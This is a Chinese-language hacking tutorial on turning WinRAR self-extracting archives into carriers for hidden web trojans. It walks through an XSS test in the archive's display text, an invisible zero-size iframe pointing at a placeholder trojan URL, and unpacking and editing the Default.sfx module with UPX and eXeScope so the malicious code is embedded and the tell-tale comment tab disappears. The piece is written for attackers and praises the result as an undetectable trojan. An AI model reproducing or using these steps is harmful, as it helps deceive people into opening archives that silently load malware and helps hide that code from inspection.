一、WinRAR與木馬結(jié)合的優(yōu)點(diǎn)

    大家都知道WinRAR軟件可以制作EXE自解壓文件，以方便沒(méi)有安裝WinRAR軟件的用戶(hù)。WinRAR制作的自解壓文件非常常見(jiàn)，而且不少軟件也開(kāi)始采用它來(lái)制作安裝程序。用WinRAR制作自解壓文件時(shí)，還可以對(duì)自解壓界面進(jìn)行自定義美化，在自解壓時(shí)顯示任意的文件或圖片。我們可以通過(guò)對(duì)WinRAR自解壓文件界面的再定義，從而欺騙對(duì)方在解壓前執(zhí)行網(wǎng)頁(yè)木馬。

    二、簡(jiǎn)單測(cè)試

    首先，我們需要制作一個(gè)WinRAR自解壓文件。可以將任意資源，比如幾張圖片或音樂(lè)之類(lèi)的打包壓縮成RAR格式。然后用WinRAR打開(kāi)壓縮包，點(diǎn)擊WinRAR工具欄上的“自解壓”按鈕，打開(kāi)自解壓文件制作對(duì)話框。在“自解壓模塊”中選擇“Deault.sfx”模塊，點(diǎn)擊“高級(jí)自解壓選項(xiàng)”按鈕，打開(kāi)高級(jí)自解壓選項(xiàng)設(shè)置對(duì)話框。選擇“文本和圖標(biāo)”選項(xiàng)卡，在下面的“自解壓文件窗口中顯示的文本”區(qū)里，可以輸人任意文字，都將顯示在自解壓界面中。如果我們輸入網(wǎng)頁(yè)代碼，是否會(huì)執(zhí)行呢？

    這里我們先來(lái)測(cè)試一下，在文本輸入?yún)^(qū)中，輸入如下代碼：

    <script>alert('nethack')</script>

    這段代碼常常被用來(lái)檢測(cè)跨站漏洞，如果存在漏洞的話，那么在網(wǎng)頁(yè)中會(huì)彈出一個(gè)文字提示對(duì)話框。點(diǎn)擊“確定”按鈕，返回自解壓對(duì)話框，再點(diǎn)擊“確定”按鈕，即可在壓縮包文件路徑下，生成一個(gè)同名的后綴為.exe的自解壓文件。現(xiàn)在，我們來(lái)雙擊這個(gè)自解壓文件，看看前面的跨站檢測(cè)代碼是否執(zhí)行？自解壓文件打開(kāi)后，同時(shí)彈出了剛才設(shè)置的文字提示對(duì)話框，說(shuō)明網(wǎng)頁(yè)代碼執(zhí)行了。

    由此可見(jiàn)，WinRAR的自解壓文件界面存在著跨站掛馬的漏洞，我們完全可以修改剛才的測(cè)試代碼，讓自解壓文件在打開(kāi)時(shí)顯示任意的網(wǎng)頁(yè)，當(dāng)然也可以顯示木馬網(wǎng)頁(yè)，從而實(shí)現(xiàn)利用WinRAR自解壓文件掛網(wǎng)頁(yè)木馬的攻擊目的！

三、自解壓掛網(wǎng)頁(yè)木馬

    現(xiàn)在，我們來(lái)制作一個(gè)具有掛馬攻擊性的WinRAR自解壓文件。首先，準(zhǔn)備一個(gè)網(wǎng)頁(yè)木馬，并將其上傳到某個(gè)網(wǎng)站空間中去。這里假設(shè)網(wǎng)頁(yè)木馬鏈接地址為“http://www.XXX.com/01.htm”。然后制作一個(gè)自解壓文件，方法與前面相同，但是在寫(xiě)入文本框中，我們需要輸入如下代碼：

    <iframe width=0 height=0 src="http://www.XXX.com/01.htm"></iframe>

    這段代碼表示顯示一個(gè)長(zhǎng)寬都為0網(wǎng)頁(yè)象素，也就是不可見(jiàn)的頁(yè)面框架，顯示的網(wǎng)頁(yè)內(nèi)容為指定的木馬網(wǎng)頁(yè)。確定后即可制作成功一個(gè)掛馬攻擊的WinRAR自解壓文件了。但是這里為了便于抓圖顯示攻擊效果，我們將掛馬語(yǔ)句改為了：

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>

    表示顯示一個(gè)長(zhǎng)寬為300的頁(yè)面框架，顯示的網(wǎng)頁(yè)內(nèi)容為百度首頁(yè)。雙擊打開(kāi)我們加入了掛馬代碼的WinRAR自解壓文件時(shí)，可以在自解壓界面窗口中看到顯示了百度網(wǎng)頁(yè)。由此可見(jiàn)掛成功！只要將代碼換為真實(shí)的掛馬代碼，那么在WinRAR自解壓界面中，就會(huì)顯示空白頁(yè)面，同時(shí)隱藏的打開(kāi)木馬網(wǎng)頁(yè)，根本察覺(jué)不到任何攻擊的癥狀！

四、掛馬自解壓包的不足

    雖然用上面的方法制作出來(lái)的WinRAR自解壓木馬，在攻擊時(shí)可以沒(méi)有任何癥狀，但是還是有缺陷的。首先，使用代碼隱藏掛馬，雖然不會(huì)顯示木馬網(wǎng)頁(yè)，但是界面中變成空白頁(yè)面，不會(huì)顯示默認(rèn)的提示信息。另外，所有制作的帶有腳本的自解壓文件，在其“屬性”中都會(huì)多出“注釋”選項(xiàng)卡，即使是不帶攻擊性的自解壓文件也是如此。我們用右鍵點(diǎn)擊剛才制作的自解壓文件，在彈出菜單中選擇“屬性”命令，打開(kāi)屬性對(duì)話框。選擇“注釋”選項(xiàng)頁(yè)，如此一來(lái)，就會(huì)暴露在創(chuàng)建自解壓格式壓縮文件時(shí)設(shè)置的掛馬代碼了。

    五、木馬保護(hù)更強(qiáng)悍

    那么，如何才能讓隱藏注釋信息，讓掛馬攻擊的自解壓包文件更完美呢？其實(shí)，自解壓文件的“注釋”信息，來(lái)源于WinRAR中的“Deault.sfx”自解壓模塊。我們完全可以修改此模塊，讓自解壓文件不顯示“注釋”信息。

    在WinRAR安裝目錄下，可以找到模塊文件“Deault.sfx”。在修改前，可用Peid查殼，發(fā)現(xiàn)文件加了UPX殼，用UPX Shell對(duì)其脫殼即可。  

    下載安裝“eXeScope資源修改器”，用eXeScope打開(kāi)“Deault.sfx”文件。在eXeScope左邊的列表中，展開(kāi)“資源”→“字符串表”→“l0”→“中文（中國(guó)）”，在右邊列表出現(xiàn)的150到155的字符串為默認(rèn)自解壓文件的自解壓文件窗口中顯示的文本代碼，每行字串長(zhǎng)度不能超過(guò)250個(gè)英文字符。我們可進(jìn)行修改，以達(dá)到隱藏掛馬的目的，在155行代碼的最后添加如下掛馬代碼：

    <iframe width=800 height=800 src="http://www.baidu.com"></iframe>

    修改完畢后，關(guān)閉eXeScope，保存更新“Deault.sfx”文件。然后直接創(chuàng)建一個(gè)WinRAR自解壓文件，無(wú)需在其中添加掛馬代碼了，此時(shí)創(chuàng)建和自解壓文件中自動(dòng)顯示了掛馬網(wǎng)頁(yè)（如圖11）。但是在文件屬性中，卻根本看不到“注釋”選項(xiàng)頁(yè)，這樣就實(shí)現(xiàn)了隱藏“注釋”信息。如果我們掛馬框架長(zhǎng)寬為0的話，在自解壓界面中顯示的是“單擊安裝按鈕開(kāi)始解壓……”之類(lèi)的默認(rèn)信息，也不會(huì)出現(xiàn)前面的空白頁(yè)。

    這樣，一個(gè)極度完美的WinRAR自解壓木馬便制作成功了！你能找出它與普通自解壓文件有什么不同嗎？